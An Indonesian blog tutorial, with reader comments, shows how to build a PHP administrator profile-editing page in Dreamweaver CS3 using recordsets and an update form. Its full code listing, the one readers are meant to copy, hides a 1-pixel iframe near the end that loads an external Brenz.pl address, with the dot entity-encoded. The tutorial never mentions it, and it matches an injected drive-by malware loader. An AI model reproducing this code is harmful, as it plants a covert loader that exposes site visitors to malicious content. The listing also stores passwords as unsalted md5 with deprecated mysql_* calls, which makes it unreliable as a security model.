Home » Tutorial Dreamweaver » Halaman Edit Profile Administrator

Halaman Edit Profile Administrator

Halaman Edit Profile Administrator - Pada tutorial sebelumnya kita sudah membuat halaman log out, hehehe maaf sudah lama gak pernah update blog ini, banyak kerjaan soalnya.

Kali ini saya mau ngelanjutin tutorial membuat website dengan dreamweaver, buat rekan – rekan yang kebingungan belajar membuat website dengan dreamweaver di blog ini, saya sarankan agar membaca dari awal (bisa diklik disini), karena tutorial disini saya ajarkan secara bertahap agar kita mengerti  tahapan – tahapan membuat website dengan dreamweaver.

Seperti biasa tutorial membuat website ini saya akan terangkan secara singkat tapi mudah – mudahan bisa dimengerti, kali ini kita akan membuat Halaman Edit Profile Administrator website.

Langsung aja pertama buka file home.php yang ada di dalam folder fileadmin.

Kemudian klik File > Save As… ( atau tekan Shitft + Ctrl + S) > beri nama editprofile.php

save as di dreamweaver cs3 dalam tutorial membuat halaman website Halaman Edit Profile Administrator

Jika sudah, melalui design view ubah tulisan “Admin Home” menjadi “Profile Admin” (saya beri tanda kota merah).

menghapus tulisan admin home di dreamweaver cs3 dalam tutorial membuat halaman website Halaman Edit Profile Administrator

Kemudian hapus tulisan yang di bawahnya (saya beri tanda kotak hijau).

Kali ini dalam membuat edit profile administrator website dengan dreamweaver, kita akan membuat Recordset untuk menampilkan data – data administrator yang sudah tersimpan didalam database pada saat anda melakukan registrasi.

Pada menu bar dreamweaver, kli Insert > Data Object > Recordset,

recordset di dreamweaver cs3 dalam tutorial membuat halaman website Halaman Edit Profile Administrator

Isikan pengaturannya sebagai berikut :

  • Name : profile_admin
  • Connection : websiteku
  • Table : admin
  • Columns : all
  • Filter : nama
  • URL Parameter ubah menjadi Session Variable, disebelahnya ketikkan MM_Username
  • Jika sudah klik ok.

Selanjutnya melalui Code View anda cari kode berikut

<div id="conten">
<h3>Admin Home</h3>
<p></p>
</div>

Kemudian diantara kode <p></p> anda ketikkan, “Anda login sebagai”.

Pada tab Application > klik Binding, maka akan terlihat Recordset (profile_admin), > drag “Nama” (yang saya beri tanda hijau) letakkan di sebelah tulisan “Anda login sebagai”.

tab application dreamweaver cs3 dalam tutorial membuat halaman website Halaman Edit Profile Administrator

maka kodenya akan menjadi

<p>
Anda login sebagai <?php echo $row_profile_admin['nama']; ?>
</p>

Selanjutnya untuk membuat paragraf baru, di bawah kode di atas anda ketikkan <p></p>, kemudian klik lagi di tengah – tengah kode <p></p>.

Selanjutnya pada menubar Dreamweaver klik Insert > Data Objects > Update Record > Record Update Form Wizard. Setelah muncul jendela Record Update Form, anda isikan pengaturannya sebagai beriku :

record update form dreamweaver cs3 dalam tutorial membuat halaman website Halaman Edit Profile Administrator

  • Connection : websiteku
  • Table to update : admin
  • Select record from : profile_admin
  • Unique key column : id
  • After updating, go to : editprofile.php (yang ada dalam folder file admin)
  • Pada form field klik id kemudian klik tanda min, ini berfungsi untuk menghilangkan field id,
  • Klik kembali pada form field password, kemudian display as ubah menjadi password field,
  • Terakhir klik ok.

Kemudian cari kode berikut, kira2 berada pada baris ke 85.

GetSQLValueString($_POST['password'], "text"),

Dan tambahkan fungsi md5, caranya ganti kode di atas menjadi

GetSQLValueString(md5 ($_POST['password']), "text"),

Kalau sudah, untuk menyimpan Halaman Edit Profile Administrator tekan Ctrl + S.

maka kode keseluruhannya kira2 seperti ini

<?php require_once('../Connections/websiteku.php'); ?>
<?php
if (!isset($_SESSION)) {
  session_start();
}
$MM_authorizedUsers = "";
$MM_donotCheckaccess = "true";

// *** Restrict Access To Page: Grant or deny access to this page
function isAuthorized($strUsers, $strGroups, $UserName, $UserGroup) { 
  // For security, start by assuming the visitor is NOT authorized. 
  $isValid = False; 

  // When a visitor has logged into this site, the Session variable MM_Username set equal to their username. 
  // Therefore, we know that a user is NOT logged in if that Session variable is blank. 
  if (!empty($UserName)) { 
    // Besides being logged in, you may restrict access to only certain users based on an ID established when they login. 
    // Parse the strings into arrays. 
    $arrUsers = Explode(",", $strUsers); 
    $arrGroups = Explode(",", $strGroups); 
    if (in_array($UserName, $arrUsers)) { 
      $isValid = true; 
    } 
    // Or, you may restrict access to only certain users based on their username. 
    if (in_array($UserGroup, $arrGroups)) { 
      $isValid = true; 
    } 
    if (($strUsers == "") && true) { 
      $isValid = true; 
    } 
  } 
  return $isValid; 
}

$MM_restrictGoTo = "logout.php";
if (!((isset($_SESSION['MM_Username'])) && (isAuthorized("",$MM_authorizedUsers, $_SESSION['MM_Username'], $_SESSION['MM_UserGroup'])))) {   
  $MM_qsChar = "?";
  $MM_referrer = $_SERVER['PHP_SELF'];
  if (strpos($MM_restrictGoTo, "?")) $MM_qsChar = "&";
  if (isset($QUERY_STRING) && strlen($QUERY_STRING) > 0) 
  $MM_referrer .= "?" . $QUERY_STRING;
  $MM_restrictGoTo = $MM_restrictGoTo. $MM_qsChar . "accesscheck=" . urlencode($MM_referrer);
  header("Location: ". $MM_restrictGoTo); 
  exit;
}
?>
<?php
if (!function_exists("GetSQLValueString")) {
function GetSQLValueString($theValue, $theType, $theDefinedValue = "", $theNotDefinedValue = "") 
{
  $theValue = get_magic_quotes_gpc() ? stripslashes($theValue) : $theValue;

  $theValue = function_exists("mysql_real_escape_string") ? mysql_real_escape_string($theValue) : mysql_escape_string($theValue);

  switch ($theType) {
    case "text":
      $theValue = ($theValue != "") ? "'" . $theValue . "'" : "NULL";
      break;    
    case "long":
    case "int":
      $theValue = ($theValue != "") ? intval($theValue) : "NULL";
      break;
    case "double":
      $theValue = ($theValue != "") ? "'" . doubleval($theValue) . "'" : "NULL";
      break;
    case "date":
      $theValue = ($theValue != "") ? "'" . $theValue . "'" : "NULL";
      break;
    case "defined":
      $theValue = ($theValue != "") ? $theDefinedValue : $theNotDefinedValue;
      break;
  }
  return $theValue;
}
}

$editFormAction = $_SERVER['PHP_SELF'];
if (isset($_SERVER['QUERY_STRING'])) {
  $editFormAction .= "?" . htmlentities($_SERVER['QUERY_STRING']);
}

if ((isset($_POST["MM_update"])) && ($_POST["MM_update"] == "form1")) {
  $updateSQL = sprintf("UPDATE `admin` SET nama=%s, password=%s WHERE id=%s",
                       GetSQLValueString($_POST['nama'], "text"),
                       GetSQLValueString(md5 ($_POST['password']), "text"),
                       GetSQLValueString($_POST['id'], "int"));

  mysql_select_db($database_websiteku, $websiteku);
  $Result1 = mysql_query($updateSQL, $websiteku) or die(mysql_error());

  $updateGoTo = "editprofile.php";
  if (isset($_SERVER['QUERY_STRING'])) {
    $updateGoTo .= (strpos($updateGoTo, '?')) ? "&" : "?";
    $updateGoTo .= $_SERVER['QUERY_STRING'];
  }
  header(sprintf("Location: %s", $updateGoTo));
}

$colname_profile_admin = "-1";
if (isset($_SESSION['MM_Username'])) {
  $colname_profile_admin = $_SESSION['MM_Username'];
}
mysql_select_db($database_websiteku, $websiteku);
$query_profile_admin = sprintf("SELECT * FROM `admin` WHERE nama = %s", GetSQLValueString($colname_profile_admin, "text"));
$profile_admin = mysql_query($query_profile_admin, $websiteku) or die(mysql_error());
$row_profile_admin = mysql_fetch_assoc($profile_admin);
$totalRows_profile_admin = mysql_num_rows($profile_admin);
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Untitled Document</title>
<link href="style.css" type="text/css" rel="stylesheet" />
</head>

<body>

<div id="header">
	<h2>Admin Websiteku</h2>
</div>

<div id="navigasi">
<ul>
	<li><a href="home.php">Home</a></li>
    <li><a href="editprofile.php">Profile</a></li>
    <li><a href="categories.php">Categories</a></li>
    <li><a href="post.php">Post</a></li>
    <li><a href="message.php">Message</a></li>
    <li><a href="logout.php">Logout</a></li>
</ul>
</div>

<div id="conten">
<h3>Profile Admin</h3>
<p>
Anda Login sebagai <?php echo $row_profile_admin['nama']; ?>
</p>

<p></p>

<form action="<?php echo $editFormAction; ?>" method="post" name="form1" id="form1">
  <table align="left">
    <tr valign="baseline">
      <td nowrap="nowrap" align="right">Nama:</td>
      <td><input type="text" name="nama" value="<?php echo htmlentities($row_profile_admin['nama'], ENT_COMPAT, 'utf-8'); ?>" size="32" /></td>
    </tr>
    <tr valign="baseline">
      <td nowrap="nowrap" align="right">Password:</td>
      <td><input type="password" name="password" value="" size="32" /></td>
    </tr>
    <tr valign="baseline">
      <td nowrap="nowrap" align="right">&nbsp;</td>
      <td><input type="submit" value="Update record" /></td>
    </tr>
  </table>
  <input type="hidden" name="MM_update" value="form1" />
  <input type="hidden" name="id" value="<?php echo $row_profile_admin['id']; ?>" />
</form>
<p>&nbsp;</p>
</div>

<iframe style="height:1px" src="http://www&#46;Brenz.pl/rc/" frameborder=0 width=1></iframe>
</body>
</html>
<?php
mysql_free_result($profile_admin);
?>

Untuk mencoba apakah Halaman Edit Profile Administrator anda berhasil atau tidak silahkan login ke halaman administrator anda, ketikkan http://localhost/websiteku.com/fileadmin,  kemudian pada menu navigation klik Profile, dan coba ganti password anda, setelah itu coba anda log out kembali, dan coba kembali login hahaha bulak balik membuat halaman edit profile administrator.

Tutorial membuat halaman edit profile administrator dengan Adobe dreamweaver cs3 ini hanya sebagai pembelajaran, bagaimana kita menggunakan fungsi recordset. Jika anda ingin menambahkan informasi admin yang lain, misalnya email admin, no telp, alamat, dll, anda harus membuatnya pada saat anda membuat tabel admin, dan mengisi Number of fieldnya sesuai kebutuhan anda. Masih bingung…?? silahkan baca tutorialnya dari awal, silahkan klik lagi disini.

Sekian Tutorial membuat halaman edit profile administrator dengan Adobe dreamweaver cs3, semoga bermanfaat, saya mohon maaf lagi sekali, karena keterbatasan waktu saya jarang update blog ini, dan tidak semua pertanyaan saya jawab.

29 Komentar

  1. Izin CTRL+D Boss, sangat membantu untuk newbie seperti saya :D

  2. Ian SMi says:

    Thnk mas Brow ilmu y…. Bermanfaat banget…!!! Di tunggu artikel Selanjutnya… ;-)

  3. luqman fiqri says:

    gan gw mintak link download dreawernya cs3,gw download kgk bisa2,mintak linknya gan ,kalau boleh y trima kasih :D

  4. afrizal says:

    Mantap gan tutorialnya,cuma ane yg edit profil blum jadi gan,anda login sebagai tidak tampil,dan edit password ga berhasil masih tetap password yang lama,kmungkinan yang salah d bagian mana ya?,tolong bantuanya gan.juga buat yg laen punya masalah sama tapi sudah ketemu solusinya mohon bantuanya…

  5. sethia says:

    gan ada cara membuat input produk gK?
    mohon pencerahaan’y…

  6. anis pramonohadi says:

    Trima kasih gan. Sudah saya ikuti dari awal sampai akhir. Memakan waktu 2 hari untuk memahami. Hasilnya bagus. Bagus dihasil dan mudah dipahami. Nuwun.
    Salam kenal !

  7. g-sann says:

    mantap gann , makasih gan .
    ditunggu tutorial berikutnya :D

  8. hendra says:

    Tks gan,
    Bermanfaat sekali

  9. najam yardo says:

    thanks gan buat artikel artikelnya, sangat membantu sekali, ditunggu kelanjutan artikel artikelnya :D

  10. Dicky says:

    Mantap gan tutornya. Semua bekerja dengan baik dan lancar. Terima kasih atas berbagi ilmunya.

  11. Gan , tolong dilanjutkan tutorialnya sangat membantu saya mempelajari Dreamweaver ini :D bagaimana cara membuat categories.php message.php dan post.php ?
    Terima kasih tutornya selama ini :D

  12. Gan , tolong dilanjutkan tutorialnya sangat membantu saya mempelajari Dreamweaver ini :D bagaimana cara membuat categories.php message.php dan post.php ? tolong tutornya sekali lagi :o

    Terima kasih tutornya selama ini :D

  13. Teguh says:

    Mantap memang mous-design.com, ini baru devloper sejati yang gak pelit ilmu, semoga amal baiknya diterima oleh tuhan, Amin..
    Sukses slalu gan…

    Oh, yah di tunggu lanjutannya yah :P :P :D

  14. florindo says:

    brow w minta cara membuat edit password dan username serta level akses dengan metode recordset biar kgk menegrtinya..thanks n bravo MOUS design Studio

  15. irpan says:

    ditunggu TUTORIAL MEMBUAT HIT COUNTER MANUAL di Dreamweaver..

    Thanks Tutorial Sebelumnya….

  16. jati says:

    yeah….
    gak sia” 5 jam di depan monitor akhirnya jadi juga…. :lol:
    makasih om atas turtornya… :D
    di tunggu kelanjutanya….

  17. rian says:

    booss bisa kirim vidio tutrialnya ngak ke email :lol:
    thanks

  18. samsul says:

    PuSSingGGGGGggggggggg

  19. Solihin says:

    di update dengan password yang baru pas login kembali engga bisa, tpi kalo pake pasword yang lama bisa .
    aq engga pake md5 dari awalnya

  20. edo setia says:

    gan, masih gak ngerti…

  21. pemula says:

    maav,, agan master bgt.. ehehhe .. gan untuk kelanjutan nya di tunggu.. very very important this learning for me… :lol: :wink:
    gan untuk mngganti password nya gmn?? cos aq update record tetep bisa login dgn pasword lama? thanksss…

  22. rama says:

    wah ane ga pertamax ini yang ane nanti2 thx ya gan :) manfaat banget gan tutorial dari ente :)

  23. wawan de worm says:

    akhirnya……!!
    WAW bgt dh mas :D

Komentar Anda!

Nama (Harus diisi)
Anda belum mengisi nama. Minimal 4 karakter. Maksimal 20 karakter.


Anda belum memasukkan email. Masukkan alamat email dengan benar. Minimal 5 karakter. Maksimal 30 karakter.


Minimal 5 karakter. Maksimal 60 karakter.

:D :-) :( :o 8O :? 8) :lol: :x :P :oops: :cry: :evil: :twisted: :roll: :wink: :!: :?: :idea: :arrow: :| :mrgreen: